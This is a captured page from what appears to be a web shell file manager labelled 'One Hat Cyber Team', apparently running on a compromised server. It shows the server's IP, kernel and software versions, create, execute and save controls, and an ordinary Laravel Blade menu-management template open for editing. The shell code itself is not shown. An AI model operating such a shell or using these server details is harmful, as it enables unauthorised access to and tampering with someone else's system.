⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
muhasebe
/
modules
/
Core
/
Views
/
admin
/
menu
/
Edit File: index.blade.php
@extends('admin.layouts.app') @section('content') <div class="container-fluid"> <div class="d-flex justify-content-between mb20"> <h1 class="title-bar">{{__('Menu Management')}}</h1> <div class="title-actions"> <a href="{{route('core.admin.menu.create')}}" class="btn btn-primary">{{__("Add new")}}</a> </div> </div> @include('admin.message') <div class="filter-div d-flex justify-content-between "> <div class="col-left"> @if(!empty($rows)) <form method="post" action="{{route('core.admin.menu.bulkEdit')}}" class="filter-form filter-form-left d-flex justify-content-start"> {{csrf_field()}} <select name="action" class="form-control"> <option value="">{{__(" Bulk Actions ")}}</option> <option value="delete">{{__(" Delete ")}}</option> </select> <button data-confirm="{{__("Do you want to delete?")}}" class="btn-info btn btn-icon dungdt-apply-form-btn" type="button">{{__('Apply')}}</button> </form> @endif </div> <div class="col-left"> </div> </div> <div class="panel"> <div class="panel-title">{{__('All Menus')}}</div> <div class="panel-body"> <form action="" class="bravo-form-item"> <table class="table table-hover"> <thead> <tr> <th width="60px"><input type="checkbox" class="check-all"></th> <th>{{__('Title')}}</th> <th>{{__("Use for")}}</th> <th>{{__('Date')}}</th> </tr> </thead> <tbody> @foreach($rows as $row) <tr> <td><input type="checkbox" name="ids[]" class="check-item" value="{{$row->id}}"> </td> <td> <a href="{{route('core.admin.menu.edit',['id'=>$row->id])}}">{{$row->name}}</a> </td> <td> @foreach($menu_locations as $l=>$menu_id) @if($menu_id == $row->id and isset($locations[$l])) {{$locations[$l]}}<br> @endif @endforeach </td> <td>{{$row->updated_at}}</td> </tr> @endforeach </tbody> </table> {{$rows->links()}} </form> </div> </div> </div> @endsection
Simpan